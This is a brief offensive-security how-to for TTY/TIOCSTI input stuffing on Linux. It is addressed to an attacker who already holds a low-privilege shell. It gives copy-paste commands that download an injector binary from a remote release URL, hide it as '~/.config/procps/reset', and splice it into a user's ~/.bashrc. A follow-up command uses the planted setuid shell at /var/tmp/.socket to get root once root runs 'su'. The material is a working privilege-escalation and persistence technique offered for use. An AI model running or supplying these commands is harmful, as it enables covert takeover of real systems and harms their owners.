(The oldest trick in the book - TTY / TIOCSTI stuffing)
Useful when all other exploits fail.
Typically used when the attacker has a shell as user 'apache', 'php' or 'postgresql'. Alice is used as an example only.
Cut & paste the following into Alice's shell:
mkdir -p ~/.config/procps 2>/dev/null
curl -o ~/.config/procps/reset -fsSL "https://github.com/hackerschoice/ttyinject/releases/download/v1.1/ttyinject-linux-$(uname -m)" \
&& chmod 755 ~/.config/procps/reset \
&& if grep -qFm1 'procps/reset' ~/.bashrc; then echo >&2 "Already installed in ~/.bashrc"; else \
echo "$(head -n1 ~/.bashrc)"$'\n'"~/.config/procps/reset 2>/dev/null"$'\n'"$(tail -n +2 ~/.bashrc)" >~/.bashrc; fi
Wait for ROOT to execute 'su alice' and thereafter gain root with:
/var/tmp/.socket -p -c "exec python3 -c \"import os;os.setuid(0);os.setgid(0);os.execl('/bin/bash', '-bash')\""
TL;DR:
su
does not allocate a new TTY when switching to a non-privileged user.- The non-privileged user can then use ioctl(0, TIOCSTI, ...) to inject input into the root's shell prompt.
- The injected input copies
/bin/sh
to/var/tmp/.socket
and +s the same. - Executes only once (from Alice's
~/.bashrc
). Deletes itself afterwards.
Read the source for more details.